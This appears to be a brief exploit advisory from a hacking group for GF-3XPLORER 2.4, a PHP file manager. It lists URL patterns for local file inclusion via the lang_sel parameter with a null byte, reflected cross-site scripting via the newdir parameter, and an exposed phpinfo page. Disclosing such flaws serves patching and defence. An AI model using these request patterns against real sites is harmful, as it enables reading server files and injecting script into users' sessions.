GF-3XPLORER version 2.4 suffers from cross site scripting and local file inclusion vulnerabilities.
37fd286e89a75fc51d6ed0e6c5bcbe284a665ba112b2369a85a5356a053cb444
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Local File Inclusion & Full Path Discolusure
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download script: http://sourceforge.net/projects/gf-3xplorer/
# magic_quotes_gpc = Off
# Exploit
# http://[site]/[path]/updater.php?lang_sel=[LFI]%00
# http://[site]/[path]/thumber.php?lang_sel=[LFI]%00
---------------------------------------------------------------
# Xss
# http://[site]/[path]/index_3x.php?newdir=">[Xss]
# And other more..
---------------------------------------------------------------
# phpinfo(); View
# http://[site]/GF-3XPLORER/explorer/phpinfo.php
---------------------------------------------------------------